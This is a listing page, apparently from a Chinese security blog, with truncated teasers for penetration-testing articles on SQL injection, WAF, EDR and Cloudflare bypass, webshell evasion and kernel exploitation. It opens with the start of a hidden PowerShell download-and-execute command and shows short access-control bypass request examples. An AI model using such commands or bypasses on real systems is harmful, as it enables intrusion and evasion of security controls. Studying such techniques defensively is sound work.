0x01 前言powershell.exe -nop -w hidden -c "IEX ((new-object net.web...
对某站点的一次详尽渗透记录
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后...
干货 | Github安全搬运工 2022年第八期
SQL-injection-bypass记录实战中的各种sql注入绕过姿势地址:https://github.com/Junehck/SQL-injection-bypassRequestTempla...
Bypass-JSPWebshell自动生成工具
前言 最近发现java的站和漏洞日益增加。对jsp的webshell的需求越来越多。 不论是为了接下来的攻防演练还是平时的工作需求,都要去研究一下。 主要针对是最常见的就是Godzi...
【分享 | 免杀】Bypass-JSPWebshell自动生成工具
前言 最近发现java的站和漏洞日益增加。对jsp的webshell的需求越来越多。不论是为了接下来的攻防演练还是平时的工作需求,都要去...
实战 | 某集团渗透项目的以洞打洞
渗透开始:访问官网获取信息开始渗透https://www.xxx.com.cn/可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务...
SentinelOne EDR Bypass Demo
展开 原文始发于微信公众号():SentinelOne EDR Bypass Demo
无需sendmail:巧用LD_PRELOAD突破disable_functions
摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安...
Cloudflare bypass
GET /admin = Error 1006 (Cloudflare)GET /admin? = 200 OKGET /admin = 403 ForbiddenGET /random-dir/.....
Authentication Bypass
/api/6798556007/users -> 403 (Forbidden) Bypass Method 1: /api//users -> 200 OK Bypass Method ...
Kernel pwn 基础教程之 ret2usr 与 bypass_smep
一、前言 在我们的pwn学习过程中,能够很明显的感觉到开发人员们为了阻止某些利用手段而增加的保护机制,往往这些保护机制又会引发出新的bypass技巧,像是我们非常熟悉的Shellcode与NX,NX与...
WAF攻防研究之四个层次Bypass WAF
from"http://weibo.com/ttarticle/p/show?id=2309404007261092631700 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也...
42